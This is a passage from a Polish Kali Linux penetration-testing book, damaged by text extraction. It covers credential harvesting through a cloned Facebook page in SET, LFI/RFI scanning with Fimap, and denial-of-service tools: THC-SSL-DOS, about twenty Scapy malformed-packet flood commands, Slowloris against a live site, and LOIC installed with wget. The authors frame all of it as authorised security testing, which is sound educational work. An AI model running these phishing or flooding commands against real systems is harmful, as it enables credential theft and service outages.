Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

